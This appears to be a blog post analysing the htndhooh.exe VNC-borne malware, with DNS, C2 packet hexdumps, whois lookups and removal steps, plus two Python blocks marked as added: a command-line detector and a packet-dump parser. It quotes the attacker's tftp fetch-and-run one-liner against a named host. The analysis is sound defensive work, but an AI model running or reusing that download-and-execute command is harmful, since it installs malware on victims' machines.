endellion.me.uk

MSMSGNER (htndhooh.exe)

Using a VNC password flaw, 71.89.139.xxx connected and forced a download of htndhooh.exe (well, at least that's what mine was called) from somewhere else:

%comspec% /c tftp -i 83.226.184.184 GET htndhooh.exe & start htndhooh
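As a detection-side counterpart, here is an added example (not from the original post) that flags this download-and-run pattern in process-creation command lines; only the first sample line is taken from the page, the rest are constructed.

```python
import re
from typing import Optional

# The one-liner quoted above has the shape:
#   %comspec% /c tftp -i <host> GET <file> & start <file>
# tftp in binary mode (-i) fetching a file that is then started is a strong
# process-creation signal; a tftp transfer on its own is only worth a look.
TFTP_GET = re.compile(
    r"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[\w.\-]+)\s+get\s+(?P<file>[^\s&|]+)",
    re.IGNORECASE,
)
CHAINED_START = re.compile(r"(?:&&?|\|)\s*start\s+(?P<target>[^\s&|]+)", re.IGNORECASE)

def _stem(name: str) -> str:
    """Lower-case file name without extension: 'start htndhooh' launches htndhooh.exe."""
    return name.lower().rsplit(".", 1)[0]

def inspect_cmdline(cmdline: str) -> Optional[dict]:
    """Describe a tftp download found in a command line, or None if there is none."""
    m = TFTP_GET.search(cmdline)
    if not m:
        return None
    info = {"host": m.group("host"), "file": m.group("file"),
            "binary_mode": bool(re.search(r"\s-i\s", cmdline, re.IGNORECASE)),
            "executes_download": False}
    s = CHAINED_START.search(cmdline)
    if s:
        info["executes_download"] = _stem(s.group("target")) == _stem(info["file"])
    return info

def scan(cmdlines) -> list:
    """(command line, details) for each tftp download; 'high' when the file is also run."""
    hits = []
    for c in cmdlines:
        d = inspect_cmdline(c)
        if d:
            d["severity"] = "high" if d["binary_mode"] and d["executes_download"] else "medium"
            hits.append((c, d))
    return hits

# Constructed sample command lines; only the first is the one quoted on this page.
SAMPLES = [
    "%comspec% /c tftp -i 83.226.184.184 GET htndhooh.exe & start htndhooh",
    "tftp -i 10.0.0.5 PUT config.txt",
    "cmd.exe /c tftp.exe 10.0.0.9 get notes.txt",
    "notepad.exe C:\\Users\\x\\tftp_notes.txt",
]
```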

At the start of htndhooh.exe a DNS query is made for jruozzfsex.egotlmdhwntvgbomjtvn.com which mercifully doesn't appear to be a registered domain name. The next query for jruozzfsex.nandomort.com yields an IP of 75.39.61.190.

Straight away a UDP packet flies in that direction, to port 48742. Attached are 50 bytes of cryptic data.

A UDP packet then comes back to Server, from 24.28.52.51 at port 16312, with 44 bytes of equally cryptic data. Though I presume the orders are somehow encapsulated within, I can't see it. Better brains no doubt can.

0000 43 21 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C!...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f9 fa 92 a9 De.0j...%.......
0020 46 b2 4a 48 c9 fb 2f af c1 e5 05 50 F.JH../....P

Then the great scanning of TCP port 5900 begins. All IPs start with 8, as does my own; the rest of the digits are randomly chosen.

Htndhooh.exe has opened some ports for listening, to wit TCP port 60644, and UDP 16312. At regular intervals UDP packets come in from 24.28.52.51, and go out to 75.39.61.190.

And who might nandomort.com be? (see below)

What is the relationship between all these IP addresses?

The original infector comes from Charter.com, so is presumably an unwitting infectee. (How they can keep their computer going I do not know.) The download of the binary comes from Sweden (inetnum: 83.226.184.0 - 83.226.191.255; netname: BB-BISP-SVL10-SE; descr: B2 customer network; country: SE)

The UDP packet gets sent to nandomort.com (;; ANSWER SECTION: jruozzfsex.nandomort.com. 3600 IN A 75.39.61.190) which belongs to
SBC Internet Services SBCIS-SBIS-6BLK (NET-75-0-0-0-1) 75.0.0.0 - 75.63.255.255
STAFFORD LESTER DBA-061103122203 SBC07503906118429061103122214 (NET-75-39-61-184-1)
75.39.61.184 - 75.39.61.191

And then there are packets coming back from 24.28.52.51, whose whois goes along the lines of a timeout:

[bored@Fedora ~]# whois 24.28.52.51
[Querying whois.arin.net]
[Redirected to ipmt.rr.com]
[Querying ipmt.rr.com]

and that's that. Roadrunner is not the most conscientious colocator then, I suppose. Traceroute takes it to mta-24-28-52-51.austin.rr.com (24.28.52.51).

But they are communicating somehow: packets only come back from roadrunner if they first get sent off to nandomort. Hmmm.

And why might they be wanting to do this? Alas. I can't find out yet. The ferocity of scanning has made poor Server come up with the dreaded Low on Memory status, and to top this the inner firewall has fallen over under the strain of holding back packets from the innocent internet. All this stuff runs as virtual machines on an outdated yesteryear's Intel Pentium D830 3GHz in a DX955XBK board with 1 GB of memory. Basically not enough. Funding, anyone? Paypal button to follow.

Second run

Restarting htndhooh.exe reveals that the choice of listening ports is random. As is the name of the server at nandomort.com, evidently. This time the query went out for wbijojpvzz.nandomort.com, but resolved as 75.39.61.190 again. The packet goes to the same port, 40742, and the returning packet still comes from 24.28.52.51.

This means that the notification of the listening port must have been enclosed in the sent packet.

0000 00 64 c0 a8 00 a0 11 62 b9 00 06 c6 b7 03 11 5a .d.....b.......Z
0010 6f 18 d6 0f cd 21 fb 81 6e 38 18 fd 4c b9 b3 10 o....!..n8..L...
0020 fe 04 e1 bd 82 31 42 ad c0 08 1c 14 0f 59 4e 9e .....1B......YN.
0030 4d 35 M5

3fb8 should be here, and 6cb7. Hmm. Maybe that's too simplistic for them.

Two packets come back.

0000 43 39 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C9...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f 2b d4 88 09 De.0j...%...+...
0020 65 44 83 c6 4c 6d 55 70 bd 93 87 51 eD..LmUp...Q

and

0000 43 3a a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C:...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f8 85 3a df De.0j...%.....:.
0020 13 2a cb b1 d2 c7 36 27 10 9c 63 fd .*....6'..c.

Obviously the first 4 bytes are a counter. Counting what? The first ever packet started with 43 21 ( 17185 ).
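The two checks made by hand above, whether the listening port is visible in the sent packet and which bytes of the replies actually change, can be scripted. This is an added example, not code from the original post: it parses the page's own dumps, searches the sent packet for 0x3fb8 (16312) and 0x6cb7 (27831) in both byte orders, and maps which reply offsets stay constant.

```python
import re
# Dumps copied from this page: the 50-byte packet sent on the second run, and
# the three 44-byte replies (first run, then the two from the second run).
SENT = """
0000 00 64 c0 a8 00 a0 11 62 b9 00 06 c6 b7 03 11 5a .d.....b.......Z
0010 6f 18 d6 0f cd 21 fb 81 6e 38 18 fd 4c b9 b3 10 o....!..n8..L...
0020 fe 04 e1 bd 82 31 42 ad c0 08 1c 14 0f 59 4e 9e .....1B......YN.
0030 4d 35 M5
"""
REPLIES = ["""
0000 43 21 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C!...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f9 fa 92 a9 De.0j...%.......
0020 46 b2 4a 48 c9 fb 2f af c1 e5 05 50 F.JH../....P
""", """
0000 43 39 a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C9...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f 2b d4 88 09 De.0j...%...+...
0020 65 44 83 c6 4c 6d 55 70 bd 93 87 51 eD..LmUp...Q
""", """
0000 43 3a a8 f2 0d 55 6e 24 6d a4 ae 41 55 a3 70 06 C:...Un$m..AU.p.
0010 44 65 06 30 6a b5 7f fb 25 e0 18 9f f8 85 3a df De.0j...%.....:.
0020 13 2a cb b1 d2 c7 36 27 10 9c 63 fd .*....6'..c.
"""]

def parse_hexdump(dump: str) -> bytes:
    """Rebuild bytes from 'offset hex... ascii' lines; the ASCII column is skipped."""
    out = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split()
        if len(tokens) < 2 or not re.fullmatch(r"[0-9a-fA-F]{4}", tokens[0]):
            continue  # not a dump line
        for tok in tokens[1:17]:  # at most 16 bytes; the first non-hex token is ASCII
            if not re.fullmatch(r"[0-9a-fA-F]{2}", tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def field_map(packets: list) -> tuple:
    """Offsets identical in every packet, and offsets that vary between them."""
    n = min(len(p) for p in packets)
    const = [i for i in range(n) if len({p[i] for p in packets}) == 1]
    return const, [i for i in range(n) if i not in const]

def find_u16(packet: bytes, value: int) -> list:
    """Every offset where value occurs as a 16-bit integer, in either byte order."""
    hits = []
    for order in ("big", "little"):
        needle, start = value.to_bytes(2, order), -1
        while (start := packet.find(needle, start + 1)) != -1:
            hits.append((start, order))
    return sorted(hits)
```

On these three replies only offset 1 and the final 16 bytes vary, and neither port value appears in the sent packet in either byte order.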

[bored@Fedora ~]# whois nandomort.com
[Querying whois.internic.net]
[Redirected to whois.dns.com.cn]
[Querying whois.dns.com.cn]
[whois.dns.com.cn]

Domain Name.......... nandomort.com
Creation Date........ 2006-08-29 01:13:35
Registration Date.... 2006-08-29 01:13:35
Expiry Date.......... 2007-08-29 01:13:35
Organisation Name.... cheng li
Organisation Address. shang xi
Organisation Address.
Organisation Address. shang xi
Organisation Address. 345678
Organisation Address. LN
Organisation Address. CN

Admin Name........... cheng li
Admin Address........ shang xi
Admin Address........
Admin Address........ shang xi
Admin Address........ 345678
Admin Address........ LN
Admin Address........ CN
Admin Email.......... adf@sina.com
Admin Phone.......... +86.2123456789
Admin Fax............ +86.2112345678

Tech Name............ cheng li
Tech Address......... shang xi
Tech Address.........
Tech Address......... shang xi
Tech Address......... 345678
Tech Address......... LN
Tech Address......... CN
Tech Email........... adf@sina.com
Tech Phone........... +86.2123456789
Tech Fax............. +86.2112345678

Bill Name............ cheng li
Bill Address......... shang xi
Bill Address.........
Bill Address......... shang xi
Bill Address......... 345678
Bill Address......... LN
Bill Address......... CN
Bill Email........... adf@sina.com
Bill Phone........... +86.2123456789
Bill Fax............. +86.2112345678
Name Server.......... ns1.dns.com.cn
Name Server.......... ns2.dns.com.cn

Removal?

Go back to last snapshot, usually... But.

%systemdir%\%windir%\system32\htndhooh.exe (fill in the particular name that can be found in the registry key below) needs deleting

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run contains a key MSMSGNER which needs deleting